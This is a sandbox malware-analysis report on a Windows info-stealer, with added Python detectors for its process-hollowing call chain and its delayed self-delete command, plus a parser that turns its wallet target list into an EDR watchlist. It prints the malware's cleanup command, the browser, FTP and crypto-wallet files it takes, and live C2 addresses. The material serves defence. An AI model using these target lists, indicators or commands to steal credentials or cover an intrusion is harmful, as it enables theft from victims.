Source: C:\Users\user\Desktop\bind.aspx.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GCAEHDBAAECB" & exit
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\bind.aspx.exe; Code function: 4_2_00341000 cpuid 4_2_00341000
Source: C:\Users\user\Desktop\bind.aspx.exe; Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,4_2_0034E8FE
Source: C:\Users\user\Desktop\bind.aspx.exe; Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\bind.aspx.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\bind.aspx.exe; Code function: 4_2_00358422 SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,4_2_00358422
Source: C:\Users\user\Desktop\bind.aspx.exe; Code function: 4_2_0034E7E4 GetProcessHeap,HeapAlloc,GetUserNameA,4_2_0034E7E4
Source: C:\Users\user\Desktop\bind.aspx.exe; Code function: 4_2_0034E8AB GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,4_2_0034E8AB
Source: C:\Users\user\Desktop\bind.aspx.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\bind.aspx.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
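Two of the findings in this section translate directly into detection logic: the API chain in 4_2_0034DD03 (CreateProcessA, GetThreadContext, WriteProcessMemory, SetThreadContext, ResumeThread, the classic process-hollowing sequence) and the delayed self-cleanup `cmd.exe /c timeout /t 10 & rd /s /q "C:\ProgramData\GCAEHDBAAECB" & exit`, which removes the stealer's staging folder after the parent has exited. The Python below is an added example written for this report; it is not Joe Sandbox code and not code recovered from the sample. The process-creation records are constructed to mirror the process tree shown here, and the `parent`/`image`/`cmdline` keys are an assumed Sysmon-style schema.

```python
"""Two detections derived from this report: the process-hollowing API chain seen in
4_2_0034DD03 and the delayed self-cleanup command (cmd.exe /c timeout /t N & rd /s /q ...).
Added example; not Joe Sandbox or Vidar code. Event records are constructed and the
'parent'/'image'/'cmdline' keys are an assumed log schema (Sysmon event 1 style)."""
import ntpath
import re
from typing import Iterable, List, Optional, Tuple

# Each step is a set of equivalent APIs; the steps must occur in this order, with any
# number of other calls in between (an ordered-subsequence match, not a contiguous one).
HOLLOWING_CHAIN = (
    {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"},
    {"GetThreadContext", "Wow64GetThreadContext"},
    {"WriteProcessMemory", "NtWriteVirtualMemory"},
    {"SetThreadContext", "Wow64SetThreadContext"},
    {"ResumeThread", "NtResumeThread"},
)

# Call chain copied from the 4_2_0034DD03 finding above.
REPORT_CHAIN_0034DD03 = (
    "4_2_0034DD03 memset,memset,CreateProcessA,VirtualAlloc,GetThreadContext,"
    "ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,"
    "WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,4_2_0034DD03")


def parse_call_chain(text: str) -> List[str]:
    """Turn a report line '<id> api,api,...,<id>' into bare API names, dropping the
    function-id bookends (e.g. 4_2_0034DD03) the report wraps around the chain."""
    body = text.split(None, 1)[1] if " " in text else text
    return [c for c in body.split(",") if c and not re.fullmatch(r"\d+_\d+_[0-9A-Fa-f]+", c)]


def is_hollowing_chain(calls: Iterable[str]) -> bool:
    """True when every step of HOLLOWING_CHAIN appears, in order, in `calls`.
    Each any() advances the one shared iterator, so a later step only looks past
    the point where the previous step matched; order violations fail."""
    it = iter(calls)
    return all(any(c in step for c in it) for step in HOLLOWING_CHAIN)


# 'timeout /t N' followed by 'rd /s /q <dir>' in one command line, quoted or not.
DELAYED_CLEANUP_RE = re.compile(
    r'timeout\s+/t\s+(?P<secs>\d+).*?&\s*(?:rd|rmdir)\s+/s\s+/q\s+"?(?P<path>[^"&]+?)"?\s*(?:&|$)',
    re.IGNORECASE)


def find_delayed_cleanup(cmdline: str) -> Optional[Tuple[int, str]]:
    """Return (delay_seconds, wiped_directory) or None if the idiom is absent."""
    m = DELAYED_CLEANUP_RE.search(cmdline)
    return (int(m["secs"]), m["path"].strip()) if m else None


# Parents under which the same idiom is plausible operator or script activity.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "conhost.exe"}

# Constructed records mirroring the process tree recorded in this report.
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\user\Desktop\bind.aspx.exe",
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GCAEHDBAAECB" & exit'},
    {"parent": r"C:\Windows\SysWOW64\cmd.exe",
     "image": r"C:\Windows\SysWOW64\timeout.exe",
     "cmdline": "timeout /t 10"},
    {"parent": r"C:\Windows\explorer.exe",  # an operator typing the same idiom by hand
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c timeout /t 5 & rd /s /q C:\Temp\old & exit'},
]


def triage_process_events(events: Iterable[dict]) -> List[dict]:
    """Flag events where a non-shell parent spawns cmd.exe to wipe a directory after a
    delay; the parent filter is the main false-positive control."""
    findings = []
    for ev in events:
        hit = find_delayed_cleanup(ev["cmdline"])
        if hit is None:
            continue
        if ntpath.basename(ev["parent"]).lower() in INTERACTIVE_PARENTS:
            continue
        secs, path = hit
        findings.append({"parent": ev["parent"], "delay_s": secs, "wiped": path,
                         "in_programdata": path.lower().startswith("c:\\programdata\\")})
    return findings


if __name__ == "__main__":
    print("hollowing chain:", is_hollowing_chain(parse_call_chain(REPORT_CHAIN_0034DD03)))
    for f in triage_process_events(SAMPLE_EVENTS):
        print("delayed cleanup:", f)
```

The chain matcher is an ordered-subsequence test, so the extra VirtualAlloc, ReadProcessMemory and VirtualAllocEx calls in the real trace do not matter, but a trace with SetThreadContext before any WriteProcessMemory does not match. Parent filtering rather than command-line filtering keeps the rule tight: the same `timeout & rd` line typed under explorer.exe or a shell is skipped, while a freshly executed binary in a user's Desktop folder spawning it is not.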

                    Stealing of Sensitive Information

Source: Yara match; File source: bind.aspx.exe, type: SAMPLE
Source: Yara match; File source: 4.2.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.0.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000000.1269068193.000000000035E000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: bind.aspx.exe PID: 6376, type: MEMORYSTR
Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: bind.aspx.exe, 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp; String found in binary or memory: \ElectronCash\wallets\
Source: bind.aspx.exe, 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp; String found in binary or memory: \Exodus\exodus.wallet\
Source: bind.aspx.exe, 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp; String found in binary or memory: info.seco
Source: bind.aspx.exe, 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp; String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: bind.aspx.exe, 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp; String found in binary or memory: MultiDoge
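The long string above is the stealer's wallet target list: a flat, pipe-delimited table with five fields per record (display name, root-folder code, sub-directory, file mask, flag). The File opened entries that follow show how the root code resolves on the sandbox: Bitcoin (code 1) is read from AppData\Roaming and Coinomi (code 0) from AppData\Local. The parser below is an added example written for this report, not code from Joe Sandbox or from the malware. It embeds an excerpt of the string as constructed input; treating code 2 as the user profile and the fifth field as a recursion flag are assumptions that this page does not confirm.

```python
"""Parser for the pipe-delimited wallet target list the stealer keeps in memory
('Bitcoin Core|1|\\Bitcoin\\wallets\\|wallet.dat|1|...').
Added example for this report; not code from Joe Sandbox or from the malware."""
import fnmatch
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Excerpt of the string observed in memory, embedded here as constructed test input.
WALLET_CONFIG_EXCERPT = (
    r"Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|"
    r"Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|"
    r"Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|"
    r"Exodus|1|\Exodus\backups\|*.*|1|"
    r"Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|"
    r"Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|"
)

# Root-folder codes. 0 and 1 are inferred from the 'File opened' entries in this report
# (Coinomi under AppData\Local, Bitcoin under AppData\Roaming). 2 is an ASSUMPTION:
# the .chia directory normally lives directly in the user profile.
ROOT_ENV = {0: "LOCALAPPDATA", 1: "APPDATA", 2: "USERPROFILE"}

# Sandbox user's environment, constructed from the paths shown in this report.
SANDBOX_ENV = {
    "LOCALAPPDATA": r"C:\Users\user\AppData\Local",
    "APPDATA": r"C:\Users\user\AppData\Roaming",
    "USERPROFILE": r"C:\Users\user",
}


@dataclass(frozen=True)
class WalletTarget:
    name: str
    root: int        # index into ROOT_ENV
    subdir: str      # relative directory, leading and trailing backslash
    mask: str        # file-name glob
    recursive: bool  # ASSUMED meaning of the fifth field (1 on Exodus\backups, 0 elsewhere)


def parse_wallet_config(blob: str) -> List[WalletTarget]:
    """Split the blob into 5-field records. A malformed blob raises instead of silently
    misaligning every record after the first bad one."""
    fields = blob.split("|")
    if fields and fields[-1] == "":
        fields.pop()                       # the blob ends with a delimiter
    if len(fields) % 5:
        raise ValueError(f"{len(fields)} fields is not a multiple of 5")
    targets = []
    for i in range(0, len(fields), 5):
        name, root, subdir, mask, flag = fields[i:i + 5]
        if root not in ("0", "1", "2") or flag not in ("0", "1"):
            raise ValueError(f"bad record: {fields[i:i + 5]}")
        targets.append(WalletTarget(name, int(root), subdir, mask, flag == "1"))
    return targets


def resolve_dir(target: WalletTarget, env: Dict[str, str]) -> str:
    """Absolute directory the stealer opens for this record. Plain concatenation on
    purpose: subdir already starts with a backslash, and the result must stay a
    Windows path even when this script runs on a Linux analysis box."""
    return env[ROOT_ENV[target.root]] + target.subdir


def watchlist(targets: Iterable[WalletTarget], env: Dict[str, str]) -> List[str]:
    """Unique directories to put under file-access auditing, deduplicated because
    several records point at the same folder."""
    return sorted({resolve_dir(t, env) for t in targets})


def matches_mask(target: WalletTarget, filename: str) -> bool:
    """Case-insensitive glob, with the Windows quirk that '*.*' also matches names
    that contain no dot at all (plain fnmatch would reject 'README')."""
    if target.mask == "*.*":
        return True
    return fnmatch.fnmatchcase(filename.lower(), target.mask.lower())


if __name__ == "__main__":
    for t in parse_wallet_config(WALLET_CONFIG_EXCERPT):
        print(f"{t.name:18} {resolve_dir(t, SANDBOX_ENV)}{t.mask}"
              f"{'  (recursive)' if t.recursive else ''}")
```

Resolving the records against the sandbox environment reproduces the directories the report lists under File opened (for example `C:\Users\user\AppData\Roaming\Bitcoin\wallets\` and `C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\`), which is a quick way to confirm the field interpretation before turning the full list into an EDR watchlist.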
Source: C:\Users\user\Desktop\bind.aspx.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\bind.aspx.exe; Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Users\user\Desktop\bind.aspx.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\bind.aspx.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\bind.aspx.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\bind.aspx.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\bind.aspx.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\bind.aspx.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Users\user\Desktop\bind.aspx.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\bind.aspx.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\bind.aspx.exe; File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\bind.aspx.exe; File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\bind.aspx.exe; File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\bind.aspx.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                    Source: Yara matchFile source: Process Memory Space: bind.aspx.exe PID: 6376, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match | File source: bind.aspx.exe, type: SAMPLE
Source: Yara match | File source: 4.2.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.bind.aspx.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000000.1269068193.000000000035E000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: bind.aspx.exe PID: 6376, type: MEMORYSTR
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61E1307A sqlite3_transfer_bindings
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61E2D5E6 sqlite3_bind_int64
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61E2D595 sqlite3_bind_double
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61E0B431 sqlite3_clear_bindings
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61E037F3 sqlite3_value_frombind
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61E2D781 sqlite3_bind_zeroblob64
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61E2D714 sqlite3_bind_zeroblob
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61E2D68C sqlite3_bind_pointer
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61E2D65B sqlite3_bind_null
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61E2D635 sqlite3_bind_int
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61E2D9B0 sqlite3_bind_value
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61E2D981 sqlite3_bind_text16
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61E2D945 sqlite3_bind_text64
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61E2D916 sqlite3_bind_text
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61E2D8E7 sqlite3_bind_blob64
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61E038CA sqlite3_bind_parameter_count
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61E158CA sqlite3_bind_parameter_index
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61E038DC sqlite3_bind_parameter_name
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_61E2D8B8 sqlite3_bind_blob
MITRE ATT&CK Matrix (techniques listed per tactic; the numeric prefixes are reproduced as shown in the report)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 1 Windows Management Instrumentation; 1 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 211 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 1 Virtualization/Sandbox Evasion; 211 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; Compile After Delivery; Indicator Removal from Tools
Credential Access: 2 OS Credential Dumping; 1 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 41 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 12 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 4 File and Directory Discovery; 45 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; 4 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 21 Encrypted Channel; 2 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label | Link
bind.aspx.exe | 42% | ReversingLabs | Win32.Trojan.Generic |
bind.aspx.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\ProgramData\GCAEHDBAAECB\freebl3.dll | 0% | ReversingLabs | |
C:\ProgramData\GCAEHDBAAECB\mozglue.dll | 0% | ReversingLabs | |
C:\ProgramData\GCAEHDBAAECB\msvcp140.dll | 0% | ReversingLabs | |
C:\ProgramData\GCAEHDBAAECB\nss3.dll | 0% | ReversingLabs | |
C:\ProgramData\GCAEHDBAAECB\softokn3.dll | 0% | ReversingLabs | |
C:\ProgramData\GCAEHDBAAECB\vcruntime140.dll | 0% | ReversingLabs | |

No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 104.102.49.254 | true | true | | unknown
stadiatechnologies.com | 95.164.119.162 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://steamcommunity.com/profiles/76561199761128941 | true | | unknown
http://stadiatechnologies.com/ | true | | unknown
https://135.181.31.18/ | true | | unknown
                                                unknown
                                                https://steam.tv/bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://steamcommunity.com/profiles/76561199761128941/badgesbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                  unknown
                                                  http://www.mozilla.com/en-US/blocklist/bind.aspx.exe, mozglue.dll.4.drfalse
                                                    unknown
                                                    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://mozilla.org0/bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGPbind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                      unknown
                                                      https://135.181.31.18/0n9:6bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://stadiatechnologies.combind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpfalse
                                                          unknown
                                                          https://store.steampowered.com/pribind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpfalse
                                                            unknown
                                                            http://store.steampowered.com/privacy_agreement/bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://135.181.31.18/Tn%:2bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://stadiatechnologies.com/(bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
